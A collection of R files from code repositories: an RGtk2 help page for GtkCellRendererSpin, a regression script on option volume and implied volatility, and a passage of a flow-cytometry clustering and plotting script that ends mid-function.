ggtitle("Run Hours") +
theme_bw() +
ylab("Weekly Run Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_run_time,color=Program)) + geom_line() +
geom_point() +
ggtitle("Cumulative Run Hours") +
theme_bw() +
ylab("Cumulative Run Hours")
print(p)
|
\alias{GtkCellRendererSpin}
\alias{gtkCellRendererSpin}
\name{GtkCellRendererSpin}
\title{GtkCellRendererSpin}
\description{Renders a spin button in a cell}
\section{Methods and Functions}{
\code{\link{gtkCellRendererSpinNew}()}\cr
\code{gtkCellRendererSpin()}
}
\section{Hierarchy}{\preformatted{GObject
+----GInitiallyUnowned
+----GtkObject
+----GtkCellRenderer
+----GtkCellRendererText
+----GtkCellRendererSpin}}
\section{Detailed Description}{\code{\link{GtkCellRendererSpin}} renders text in a cell like \code{\link{GtkCellRendererText}} from
which it is derived. But while \code{\link{GtkCellRendererText}} offers a simple entry to
edit the text, \code{\link{GtkCellRendererSpin}} offers a \code{\link{GtkSpinButton}} widget. Of course,
that means that the text has to be parseable as a floating point number.
The range of the spinbutton is taken from the adjustment property of the
cell renderer, which can be set explicitly or mapped to a column in the
tree model, like all properties of cell renders. \code{\link{GtkCellRendererSpin}}
also has properties for the climb rate and the number of digits to
display. Other \code{\link{GtkSpinButton}} properties can be set in a handler for the
start-editing signal.
The \code{\link{GtkCellRendererSpin}} cell renderer was added in GTK+ 2.10.}
\section{Structures}{\describe{\item{\verb{GtkCellRendererSpin}}{
\emph{undocumented
}
}}}
\section{Convenient Construction}{\code{gtkCellRendererSpin} is the equivalent of \code{\link{gtkCellRendererSpinNew}}.}
\section{Properties}{\describe{
\item{\verb{adjustment} [\code{\link{GtkAdjustment}} : * : Read / Write]}{
The adjustment that holds the value of the spinbutton.
This must be non-\code{NULL} for the cell renderer to be editable.
Since 2.10
}
\item{\verb{climb-rate} [numeric : Read / Write]}{
The acceleration rate when you hold down a button.
Allowed values: >= 0 Default value: 0 Since 2.10
}
\item{\verb{digits} [numeric : Read / Write]}{
The number of decimal places to display.
Allowed values: <= 20 Default value: 0 Since 2.10
}
}}
\references{\url{https://developer-old.gnome.org/gtk2/stable/GtkCellRendererSpin.html}}
\author{Derived by RGtkGen from GTK+ documentation}
\seealso{
\code{\link{GtkCellRendererText}}
\code{\link{GtkSpinButton}}
}
\keyword{internal}
| /RGtk2/man/GtkCellRendererSpin.Rd | no_license | lawremi/RGtk2 | R | false | false | 2,384 | rd | \alias{GtkCellRendererSpin}
\alias{gtkCellRendererSpin}
\name{GtkCellRendererSpin}
\title{GtkCellRendererSpin}
\description{Renders a spin button in a cell}
\section{Methods and Functions}{
\code{\link{gtkCellRendererSpinNew}()}\cr
\code{gtkCellRendererSpin()}
}
\section{Hierarchy}{\preformatted{GObject
+----GInitiallyUnowned
+----GtkObject
+----GtkCellRenderer
+----GtkCellRendererText
+----GtkCellRendererSpin}}
\section{Detailed Description}{\code{\link{GtkCellRendererSpin}} renders text in a cell like \code{\link{GtkCellRendererText}} from
which it is derived. But while \code{\link{GtkCellRendererText}} offers a simple entry to
edit the text, \code{\link{GtkCellRendererSpin}} offers a \code{\link{GtkSpinButton}} widget. Of course,
that means that the text has to be parseable as a floating point number.
The range of the spinbutton is taken from the adjustment property of the
cell renderer, which can be set explicitly or mapped to a column in the
tree model, like all properties of cell renders. \code{\link{GtkCellRendererSpin}}
also has properties for the climb rate and the number of digits to
display. Other \code{\link{GtkSpinButton}} properties can be set in a handler for the
start-editing signal.
The \code{\link{GtkCellRendererSpin}} cell renderer was added in GTK+ 2.10.}
\section{Structures}{\describe{\item{\verb{GtkCellRendererSpin}}{
\emph{undocumented
}
}}}
\section{Convenient Construction}{\code{gtkCellRendererSpin} is the equivalent of \code{\link{gtkCellRendererSpinNew}}.}
\section{Properties}{\describe{
\item{\verb{adjustment} [\code{\link{GtkAdjustment}} : * : Read / Write]}{
The adjustment that holds the value of the spinbutton.
This must be non-\code{NULL} for the cell renderer to be editable.
Since 2.10
}
\item{\verb{climb-rate} [numeric : Read / Write]}{
The acceleration rate when you hold down a button.
Allowed values: >= 0 Default value: 0 Since 2.10
}
\item{\verb{digits} [numeric : Read / Write]}{
The number of decimal places to display.
Allowed values: <= 20 Default value: 0 Since 2.10
}
}}
\references{\url{https://developer-old.gnome.org/gtk2/stable/GtkCellRendererSpin.html}}
\author{Derived by RGtkGen from GTK+ documentation}
\seealso{
\code{\link{GtkCellRendererText}}
\code{\link{GtkSpinButton}}
}
\keyword{internal}
|
require("texreg")
regData = read.csv("~/Downloads/regdata.csv")
regData = transform(regData, NCallOILag1 = c(NCallOI))
#regData = transform(regData, NCallOIChangedLag1 = c(NCallOIChanged[-1], NA))
regData = transform(regData, NPutOILag1 = c(NPutOI[-1], NA))
#regData = transform(regData, NPutOIChangeLag1 = c(NPutOIChange[-1], NA))
regData = transform(regData, NVolLag1 = c(NVol[-1], NA))
#regData = transform(regData, NVolChangeLag1 = c(NVolChange[-1], NA))
regData = transform(regData, PutCallOIRatioLag1 = c(PutCallOIRatio[-1], NA))
regData = transform(regData, NMeanIVLag1 = c(NMeanIV[-1], NA))
regData = transform(regData, MeanIVLag1 = c(MeanIV[-1], NA))
regData = transform(regData, CallIVLag1 = c(CallIV[-1], NA))
regData = transform(regData, PutIVLag1 = c(PutIV[-1], NA))
regData = transform(regData, Excess.ReturnLag1 = c(Excess.Return[-1], NA))
regDataBase = regData[regData$DateDiff >= -141 & regData$DateDiff <= -41 ,]
regData30 = regData[regData$DateDiff >= -30 & regData$DateDiff <= -1,]
regData20 = regData[regData$DateDiff >= -20 & regData$DateDiff <= -1,]
regData10 = regData[regData$DateDiff >= -10 & regData$DateDiff <= -1,]
baseModel <- function(dataToUse) {
lm(Excess.Return ~
NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1
+ NVol + PutCallOIRatio + NCallOI + NPutOI
, data=dataToUse)
}
baseModelLagOnly <- function(dataToUse) {
lm(Excess.Return ~
NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1
, data=dataToUse)
}
baseModelIV <- function(dataToUse) {
lm(Excess.Return ~
NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1 + NMeanIVLag1
+ NVol + PutCallOIRatio + NCallOI + NPutOI + NMeanIV
, data=dataToUse)
}
baseModelIVLagOnly <- function(dataToUse) {
lm(Excess.Return ~
NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1 + NMeanIVLag1
, data=dataToUse)
}
latexToPng <- function(latexS, fileName) {
latexFileName = paste(fileName, ".tex", sep='')
dviFileName = paste(fileName, ".dvi", sep='')
fileConn<-file(latexFileName)
#\\usepackage[paperwidth=5.5in,paperheight=7in,noheadfoot,margin=0in]{geometry}
beginLines = '\\documentclass{report}
\\usepackage{booktabs}
\\usepackage{dcolumn}
\\begin{document}\\pagestyle{empty}
\\begin{table}
\\begin{center}
'
endLines = '
\\end{center}
\\label{table:coefficients}
\\end{table}
\\end{document}
'
writeLines(c(beginLines, latexS, endLines), fileConn)
close(fileConn)
invisible(system(paste("latex ", latexFileName)))
invisible(system(paste("dvipng -T tight", "-D", 600, dviFileName)))
}
modelBase = baseModel(regDataBase)
modelBaseLag = baseModelLagOnly(regDataBase)
model30 = baseModel(regData30)
model30Lag = baseModelLagOnly(regData30)
model20 = baseModel(regData20)
model20Lag = baseModelLagOnly(regData20)
model10 = baseModel(regData10)
model10Lag = baseModelLagOnly(regData10)
modelBaseIV = baseModelIV(regDataBase)
modelBaseIVLag = baseModelIVLagOnly(regDataBase)
model30IV = baseModelIV(regData30)
model30IVLag = baseModelIVLagOnly(regData30)
model20IV = baseModelIV(regData20)
model20IVLag = baseModelIVLagOnly(regData20)
model10IV = baseModelIV(regData10)
model10IVLag = baseModelIVLagOnly(regData10)
latexBaseModel = texreg(list(modelBase, modelBaseLag, model30,model30Lag,
model20,model20Lag,model10,model10Lag),
model.names=c("[-141,-41]","[-141,-41]", "[-30,-1]","[-30,-1]",
"[-20,-1]","[-20,-1]","[-10,-1]","[-10,-1]"),
digits = 5, table=FALSE, booktabs=FALSE, dcolumn=FALSE)
latexToPng(latexBaseModel, "baseModel")
latexBaseModelIV = texreg(list(modelBaseIV, modelBaseIVLag, model30IV,model30IVLag,
model20IV,model20IVLag,model10IV,model10IVLag),
model.names=c("[-141,-41]","[-141,-41]", "[-30,-1]","[-30,-1]",
"[-20,-1]","[-20,-1]", "[-10,-1]","[-10,-1]"),
digits = 5, table=FALSE, booktabs=FALSE, dcolumn=FALSE)
latexToPng(latexBaseModelIV, "baseModelIV")
| /FINA6206.R | no_license | qanwer/R | R | false | false | 4,125 | r |
require("texreg")
regData = read.csv("~/Downloads/regdata.csv")
regData = transform(regData, NCallOILag1 = c(NCallOI))
#regData = transform(regData, NCallOIChangedLag1 = c(NCallOIChanged[-1], NA))
regData = transform(regData, NPutOILag1 = c(NPutOI[-1], NA))
#regData = transform(regData, NPutOIChangeLag1 = c(NPutOIChange[-1], NA))
regData = transform(regData, NVolLag1 = c(NVol[-1], NA))
#regData = transform(regData, NVolChangeLag1 = c(NVolChange[-1], NA))
regData = transform(regData, PutCallOIRatioLag1 = c(PutCallOIRatio[-1], NA))
regData = transform(regData, NMeanIVLag1 = c(NMeanIV[-1], NA))
regData = transform(regData, MeanIVLag1 = c(MeanIV[-1], NA))
regData = transform(regData, CallIVLag1 = c(CallIV[-1], NA))
regData = transform(regData, PutIVLag1 = c(PutIV[-1], NA))
regData = transform(regData, Excess.ReturnLag1 = c(Excess.Return[-1], NA))
regDataBase = regData[regData$DateDiff >= -141 & regData$DateDiff <= -41 ,]
regData30 = regData[regData$DateDiff >= -30 & regData$DateDiff <= -1,]
regData20 = regData[regData$DateDiff >= -20 & regData$DateDiff <= -1,]
regData10 = regData[regData$DateDiff >= -10 & regData$DateDiff <= -1,]
baseModel <- function(dataToUse) {
lm(Excess.Return ~
NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1
+ NVol + PutCallOIRatio + NCallOI + NPutOI
, data=dataToUse)
}
baseModelLagOnly <- function(dataToUse) {
lm(Excess.Return ~
NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1
, data=dataToUse)
}
baseModelIV <- function(dataToUse) {
lm(Excess.Return ~
NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1 + NMeanIVLag1
+ NVol + PutCallOIRatio + NCallOI + NPutOI + NMeanIV
, data=dataToUse)
}
baseModelIVLagOnly <- function(dataToUse) {
lm(Excess.Return ~
NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1 + NMeanIVLag1
, data=dataToUse)
}
latexToPng <- function(latexS, fileName) {
latexFileName = paste(fileName, ".tex", sep='')
dviFileName = paste(fileName, ".dvi", sep='')
fileConn<-file(latexFileName)
#\\usepackage[paperwidth=5.5in,paperheight=7in,noheadfoot,margin=0in]{geometry}
beginLines = '\\documentclass{report}
\\usepackage{booktabs}
\\usepackage{dcolumn}
\\begin{document}\\pagestyle{empty}
\\begin{table}
\\begin{center}
'
endLines = '
\\end{center}
\\label{table:coefficients}
\\end{table}
\\end{document}
'
writeLines(c(beginLines, latexS, endLines), fileConn)
close(fileConn)
invisible(system(paste("latex ", latexFileName)))
invisible(system(paste("dvipng -T tight", "-D", 600, dviFileName)))
}
modelBase = baseModel(regDataBase)
modelBaseLag = baseModelLagOnly(regDataBase)
model30 = baseModel(regData30)
model30Lag = baseModelLagOnly(regData30)
model20 = baseModel(regData20)
model20Lag = baseModelLagOnly(regData20)
model10 = baseModel(regData10)
model10Lag = baseModelLagOnly(regData10)
modelBaseIV = baseModelIV(regDataBase)
modelBaseIVLag = baseModelIVLagOnly(regDataBase)
model30IV = baseModelIV(regData30)
model30IVLag = baseModelIVLagOnly(regData30)
model20IV = baseModelIV(regData20)
model20IVLag = baseModelIVLagOnly(regData20)
model10IV = baseModelIV(regData10)
model10IVLag = baseModelIVLagOnly(regData10)
latexBaseModel = texreg(list(modelBase, modelBaseLag, model30,model30Lag,
model20,model20Lag,model10,model10Lag),
model.names=c("[-141,-41]","[-141,-41]", "[-30,-1]","[-30,-1]",
"[-20,-1]","[-20,-1]","[-10,-1]","[-10,-1]"),
digits = 5, table=FALSE, booktabs=FALSE, dcolumn=FALSE)
latexToPng(latexBaseModel, "baseModel")
latexBaseModelIV = texreg(list(modelBaseIV, modelBaseIVLag, model30IV,model30IVLag,
model20IV,model20IVLag,model10IV,model10IVLag),
model.names=c("[-141,-41]","[-141,-41]", "[-30,-1]","[-30,-1]",
"[-20,-1]","[-20,-1]", "[-10,-1]","[-10,-1]"),
digits = 5, table=FALSE, booktabs=FALSE, dcolumn=FALSE)
latexToPng(latexBaseModelIV, "baseModelIV")
|
####################################################
#### INSTALLATION OF ALL PACKAGES Below - do not need to repeat if already in library (Try running lines 16-19 first, if some packages missing revert to line 4-11):
####################################################
source("https://bioconductor.org/biocLite.R")
biocLite()
biocLite("FlowSOM")
install.packages("biocLite")
biocLite(suppressUpdates = TRUE)
biocLite("flowCore", suppressUpdates = TRUE)
install.packages('devtools')
install.packages('Rcpp')
install.packages('biclust')
install.packages('data.table')
install.packages('diptest')
install.packages('evtree')
install.packages('ggdendro')
install.packages("ggfortify")
install.packages('ggplot2')
install.packages('gplots')
install.packages('gdata')
install.packages('ggrepel')
install.packages('ggRandomForests')
install.packages('gridExtra')
install.packages('gtable')
install.packages('gtools')
install.packages('igraph')
install.packages('MASS')
install.packages('packcircles')
install.packages('plyr')
install.packages("randomForestSRC")
install.packages('reshape2')
install.packages('pheatmap')
install.packages('readxl')
install.packages("raster")
install.packages('openxlsx')
install.packages('devtools')
library("devtools")
install_github('tchitchek-lab/SPADEVizR')
source("http://bioconductor.org/biocLite.R")
biocLite(suppressUpdates = TRUE)
biocLite("flowCore", suppressUpdates = TRUE)
install.packages('edgeR')
biocLite("edgeR")
install.packages("bindrcpp")
install.packages("stringi")
install.packages("statmod")
###################################################
# Library the packages
###################################################
library("devtools")
library("FlowSOM")
library('Rcpp')
library("SPADEVizR")
library(statmod)
library("edgeR")
library(gplots)
library(RColorBrewer)
library(pheatmap)
library(readxl)
library(openxlsx)
library(data.table)
library(ggplot2)
library(raster)
####################################################
####################################################
source("utils.R") #Sources utils function for phenoviewer_modified
##################################################
# Parallel coordinate plots generated using SPADEvizR - FOR GROUP 1 DATA:
##################################################
### Imports Sheet 4 and Sheet 2 and renames "Abundance" and "Phenotype" respectively, from desired excel file - must change path and excel file name for particular function
PrimaryDirectory <- getwd()
Abundance <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet4")
View(Abundance)
Phenotype <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet2")
View(Phenotype)
### Reformats data for R to run SpadeVizR Script - must change lines 43 and 47 to match size of Abundance and Phenotype Sheets (rows, columns)
cluster.abundances <- as.data.frame(Abundance[1:185,1:17])
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
cluster.phenotypes <- as.data.frame(Phenotype[1:2960,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
### MODIFIED PHENOVIEWER SCRIPT FOR MORE ACCURATE PARALLEL PLOTS ###
phenoViewer_modified <- function(Results,
samples = NULL,
clusters = NULL,
markers = NULL,
show.mean = "both",
show.on_device = TRUE,
sort.markers = TRUE) {
### when testing the function, use the parameters inside the function and test line by line of code. Use statement below to test the function above
# Results=results
# samples = NULL
# clusters = "Cluster 10"
# markers = NULL
# show.mean = "only"
# show.on_device = TRUE
# sort.markers = TRUE
if (is.null(Results)) {
stop("Error in phenoViewer: 'Results' parameter can not be NULL")
} else if (class(Results)[1] != "Results") {
stop("Error in phenoViewer: 'Results' parameter must be a 'Results' object")
}
if(length(Results@marker.names) == 0){
stop("Error in phenoViewer: 'Results' object must contain phenotypes")
}
if (is.null(samples)) {
samples <- Results@sample.names
data <- Results@cluster.phenotypes
cluster.abundances <- Results@cluster.abundances
} else if (!all(samples %in% Results@sample.names)) {
stop("Error in phenoViewer: 'samples' parameter must contains only samples names\n Unknown sample names: ",
paste(setdiff(unique(samples), Results@sample.names), collapse = " "))
} else {
data <- subset(Results@cluster.phenotypes, sample %in% samples, drop = FALSE)
cluster.abundances <- Results@cluster.abundances[, samples, drop = FALSE]
}
data <- stats::na.omit(data)
if (is.null(clusters)) {
stop("Error in phenoViewer: 'clusters' parameter is required")
} else if (all(clusters %in% Results@cluster.names)) {
if (typeof(clusters) != "character") {
stop("Error in phenoViewer: 'clusters' parameter must be a character vector")
}
clusters <- unique(clusters)
clusters.select <- data[, "cluster"] %in% clusters
data <- data[clusters.select,]
cluster.abundances <- cluster.abundances[clusters,]
} else {
stop("Error in phenoViewer:\nUnknown clusters : ", paste(setdiff(unique(clusters), Results@cluster.names), collapse = " "))
}
data <- plyr::ddply(data, c("sample"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
if (is.null(markers)) {
markers <- Results@marker.names
} else if (all(markers %in% Results@marker.names)) {
markers <- unique(markers)
data <- data[, c("sample", markers)]
} else {
stop("Error in phenoViewer: Unknown markers :", paste(setdiff(unique(markers), Results@marker.names), collapse = " "))
}
if (show.mean != "none" && show.mean != "both" && show.mean != "only") {
stop("Error in phenoViewer: 'show.mean' parameter must contain only one of these : 'none', 'both' or 'only'")
}
if (!is.logical(show.on_device)) { stop("Error in phenoViewer: 'show.on_device' parameter must be a logical") }
data <- reshape2::melt(data, id = c("sample"), stringsAsFactors = FALSE)
colnames(data) <- c("samples", "marker", "value")
names.palette <- unique(Results@cluster.phenotypes$sample)
palette <- ggcolors(length(names.palette))
names(palette) <- names.palette
assignments <- Results@assignments
if (!is.null(assignments)) {
order <- unique(assignments$bc)
assignments <- assignments[samples, , drop = FALSE]
data$bc <- assignments[data$samples, "bc"]
order <- intersect(order, unique(assignments$bc))
data$bc <- factor(data$bc, levels = order)
names.palette <- unique(assignments$bc)
palette <- ggcolors(length(names.palette))
names(palette) <- names.palette
} else if (is.element("bc", colnames(assignments))) {
warning("Warning in phenoViewer: 'assignments' slot do not contain the column 'bc' in the provided 'Results' object. Consequently, the samples names will be used in remplacement")
} else {
warning("Warning in phenoViewer: 'assignments' slot in the provided 'Results' object is absent. Consequently, the samples names will be used in remplacement")
}
if(sort.markers==TRUE){
clustering.markers <- Results@clustering.markers
ordered.markers <- c(gtools::mixedsort(clustering.markers),gtools::mixedsort(setdiff(Results@marker.names, clustering.markers)))
bold.markers <- ifelse(is.element(ordered.markers, clustering.markers), "bold", "plain")
colored.markers <- ifelse(is.element(ordered.markers, clustering.markers), "blue", "black")
data$marker <- factor(data$marker, levels = ordered.markers, ordered = TRUE)
}else{
clustering.markers <- Results@clustering.markers
ordered.markers <- markers
bold.markers <- ifelse(is.element(ordered.markers, clustering.markers), "bold", "plain")
colored.markers <- ifelse(is.element(ordered.markers, clustering.markers), "blue", "black")
data$marker <- factor(data$marker, levels = ordered.markers, ordered = TRUE)
}
for (i in seq_len(nrow(data))) {
data[i, "lower.bound"] <- Results@bounds[1, as.character(data[i, "marker"])]
data[i, "upper.bound"] <- Results@bounds[2, as.character(data[i, "marker"])]
}
cells.number <- sum(colSums(cluster.abundances))
title <- paste("Pheno Viewer - cluster: ", paste0(clusters, collapse = ", "), " (", format(cells.number, big.mark = " "), " cells)", sep = "")
bounds <- as.numeric(row.names(Results@bounds))
subtitle <- paste0("Grey ribbon displays from ", (bounds[1] * 100), "% to ", (bounds[2] * 100), "% percentiles of the range expression")
max.value <- -1
min.value <- -1
max.value <- max(c(data$value, data$upper.bound), na.rm = TRUE)
min.value <- min(c(data$value, data$lower.bound), na.rm = TRUE)
max.value <- max.value * (1 + sign(max.value) * 0.1)
min.value <- min.value * (1 - sign(min.value) * 0.1)
means <- plyr::ddply(data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(means) <- c("marker", "means")
data_means <- data.frame(marker = 0, means= 0, clusters = 0)
tmp_clusters<- unique(cluster.phenotypes$Cluster) ###### make sure the cluster.phenotypes file column name is "Cluster" and not "cluster"
for(i in tmp_clusters){
tmp_data<- Results@cluster.phenotypes
tmp_clusters.select <- tmp_data[, "cluster"] %in% i
tmp_data <- tmp_data[tmp_clusters.select,]
tmp_data <- plyr::ddply(tmp_data, c("sample"), function(df) {
apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
})
tmp_data <- reshape2::melt(tmp_data, id = c("sample"), stringsAsFactors = FALSE)
colnames(tmp_data) <- c("samples", "marker", "value")
tmp_means <- plyr::ddply(tmp_data,
c("marker"),
function(df){mean(df$value, na.rm = TRUE)})
colnames(tmp_means) <- c("marker", "means")
tmp_means$clusters = i
data_means = rbind(data_means, tmp_means)
}
data_means = data_means[-1, ]
# data_means$marker = substr(data_means$marker, 2, 100000)
#data_means = data_means[order(data_means$marker, decreasing = TRUE), ]
plot <- ggplot2::ggplot(data = data_means) +
ggplot2::ggtitle(bquote(atop(.(title), atop(italic(.(subtitle)), ""))))
plot <- plot + ggplot2::geom_line(ggplot2::aes_string(x = "marker", y = "means", group = "clusters"),
size = 0.5, #changes size of background lines
alpha = 1,
color = "#CCCCCC")+
ggplot2::scale_y_continuous(limits = c(min.value, max.value), breaks = round(seq(0, max.value, by = 1), 0)) +
ggplot2::theme_bw()
plot <- plot + ggplot2::geom_line(data = means,
ggplot2::aes_string(x = "marker", y = "means", group = 1),
#group = 1,
linetype = "solid",
size = 1,
color = "#FF6666")
plot <- plot + ggplot2::theme(axis.text.x = ggplot2::element_text(angle = 90, hjust = 1, vjust = 0.5, face = bold.markers, color = colored.markers)) +
ggplot2::theme(legend.text = ggplot2::element_text(size = 6),
legend.key = ggplot2::element_blank(),
plot.title = ggplot2::element_text(hjust=0.5)) +
ggplot2::xlab("markers") +
ggplot2::ylab("marker expressions") +
ggplot2::guides(col = ggplot2::guide_legend(ncol = 1))
grid::grid.draw(plot)
invisible(plot)
}
dir.create("Group1_ClusterImages", showWarnings = FALSE)
setwd("Group1_ClusterImages")
for(i in 1:nrow(cluster.abundances)){
#i=1
jpeg(paste(rownames(cluster.abundances)[i], ".jpeg", sep = ""),
width=2000,
height=1500,
res = 300)
phenoViewer_modified(results, clusters = rownames(cluster.abundances)[i])
dev.off()
}
setwd(PrimaryDirectory)
####################################
#SCATTER PLOT GENERATOR
###################################
GroupOne_SheetFour <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet4")
write.table(GroupOne_SheetFour, file = "Data for Scatter Plot Group 1.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
#load data
data <- read.table("Data for Scatter Plot Group 1.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
data <- as.data.frame(data[1:185,1:17])
data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
sum_counts_sample <- colSums(data)
for (i in 1:nrow(data)) {
for (j in 1:ncol(data)) {
data[i,j] = data[i,j]/sum_counts_sample[j]*100
}
}
#transpose the data for ploting
data <- t(data)
data <- as.data.frame(data)
#group assignment
group_data <- read.table("group assignment for group 1.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Group1_Scatterplots", showWarnings = FALSE)
setwd("Group1_Scatterplots")
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
for(i in 2:ncol(data)){
scatter_plot <-
ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
stat_summary(
fun.ymin = function(z) { quantile(z,0.25) },
fun.ymax = function(z) { quantile(z,0.75) },
fun.y = median,
width = 0.2,
geom = "errorbar") +
theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
theme(legend.position = "none")
ggsave(scatter_plot,
width = 20,
height = 15,
dpi = 300,
filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
##################################################
# Parallel co-ordinate plots generated using SPADEvizR - FOR GROUP 2 DATA:
##################################################
### Imports Sheet 4 and Sheet 2 and renames "Abundance" and "Phenotype" respectively, from desired excel file - must change path and excel file name for particular function
Abundance <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet4")
View(Abundance)
Phenotype <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet2")
View(Phenotype)
### Reformats data for R to run SpadeVizR Script - must change lines 85 and 89 to match size of Abundance and Phenotype Sheets (rows, columns)
cluster.abundances <- as.data.frame(Abundance[1:151,1:16])
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
cluster.phenotypes <- as.data.frame(Phenotype[1:2265,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
dir.create("Group2_ClusterImages", showWarnings = FALSE)
setwd("Group2_ClusterImages")
for(i in 1:nrow(cluster.abundances)){
jpeg(paste(rownames(cluster.abundances)[i], ".jpeg", sep = ""),
width=2000,
height=1500,
res = 300)
phenoViewer_modified(results, clusters = rownames(cluster.abundances)[i])
dev.off()
}
setwd(PrimaryDirectory)
####################################
#SCATTER PLOT GENERATOR
###################################
GroupTwo_SheetFour <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet4")
write.table(GroupTwo_SheetFour, file = "Data for Scatter Plot Group 2.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
#load data
data <- read.table("Data for Scatter Plot Group 2.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
data <- as.data.frame(data[1:151,1:16])
data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
sum_counts_sample <- colSums(data)
for (i in 1:nrow(data)) {
for (j in 1:ncol(data)) {
data[i,j] = data[i,j]/sum_counts_sample[j]*100
}
}
#transpose the data for ploting
data <- t(data)
data <- as.data.frame(data)
#group assignment
group_data <- read.table("group assignment for group 2.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Group2_Scatterplots", showWarnings = FALSE)
setwd("Group2_Scatterplots")
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
for(i in 2:ncol(data)){
scatter_plot <-
ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
stat_summary(
fun.ymin = function(z) { quantile(z,0.25) },
fun.ymax = function(z) { quantile(z,0.75) },
fun.y = median,
width = 0.2,
geom = "errorbar") +
theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
theme(legend.position = "none")
ggsave(scatter_plot,
width = 20,
height = 15,
dpi = 300,
filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
#########################################################################################################################################################
#########################################################################################################################################################
#### Next four lines of code generate .txt files from sheet one of group 1 and 2 excel sheets to be used for pearson's correlation
### Creates a .txt file of sheet one from Group 1 excel file containing all vortex data
GroupOne_SheetOne <- read_excel("./Grp 1 DR3 D51 B Cells 20181205 K=35.xlsx", sheet = "Sheet1")
write.table(GroupOne_SheetOne, file = "Grp 1 DR3 D51 B Cells 20181205 K=35.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
### Creates a .txt file of sheet one from Group 2 excel file containing all vortex data
GroupTwo_SheetOne <- read_excel("./Grp 2 DR3 D51 B Cells 20181205 K=26.xlsx", sheet = "Sheet1")
write.table(GroupTwo_SheetOne, file = "Grp 2 DR3 D51 B Cells 20181205 K=26.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
###################################################
# Generates a list of matching clusters from group 1 and 2 based on pearson's correlation and count
###################################################
rescale_to_0_1 <- function(experiment_name, experiment_file, rescale = TRUE){
#read the file
raw_table = read.delim(experiment_file, sep = "\t", stringsAsFactors = FALSE)
#modify the column name
colnames(raw_table) = gsub("X.", "", colnames(raw_table), fixed = TRUE)
colnames(raw_table) = gsub("X", "", colnames(raw_table), fixed = TRUE)
#modify the cluster name
raw_table$Cluster = gsub("Cluster", "", raw_table$Cluster, fixed = TRUE)
raw_table$Cluster = gsub(" ", "", raw_table$Cluster, fixed = TRUE)
raw_table$Cluster = paste("Cluster_", raw_table$Cluster, sep = "")
#sorting the dataset for better view
raw_table = raw_table[order(raw_table$Cluster, raw_table$Term, decreasing = FALSE),]
#obtain the samples name
samples = unique(raw_table$Term)
#obtain the amount of samples
nSample= length(samples)
